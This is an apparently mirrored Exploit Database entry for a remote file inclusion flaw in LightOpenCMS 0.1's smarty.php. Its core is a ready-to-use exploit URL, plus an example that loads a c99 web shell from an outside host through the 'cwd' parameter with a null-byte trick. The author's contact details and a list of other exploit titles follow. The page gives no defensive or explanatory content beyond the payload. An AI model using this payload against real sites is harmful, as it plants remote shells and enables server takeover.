LightOpenCMS 0.1 – ‘smarty.php’ Remote File Inclusion

Exploit Database
11 阅读

作者： Zer0 Thunder

日期： 2010-01-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11003/

# Exploit Title: LightOpen CMS Remote File Inclusion (smarty.php) 
# Date: 2010-01-05
# Author: Zer0 Thunder
# Software Link: http://sourceforge.net/projects/lightopencms/
# Version: v0.1
# Tested on: Windows XP sp2 [Wamp] 
# CVE : 
# Code :

Exploit :
http://site.com/path/smarty.php?cwd=[shell.txt]?%00


Example : 
http://localhost/locms/smarty.php?cwd=http://www.cfsm.cn/c99.txt?%00

########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
########################################

last Exploits
LightOpenCMS 0.1 – ‘smarty.php’ Remote File Inclusion的更多信息

WolfCMS 0.8.3.1 – Open Redirection：
Pixie CMS 1.0.4 – ‘/admin/index.php’ SQL Injection：
Answerdev 1.0.3 – Account Takeover：
MyBB 1.8.13 – Remote Code Execution：
Sitefinity CMS 9.2 – Cross-Site Scripting：
Elite Gaming Ladders 3.5 – ‘match’ SQL Injection：
aradblog – Multiple Vulnerabilities：
Thrive Smart Home 1.1 – Authentication Bypass：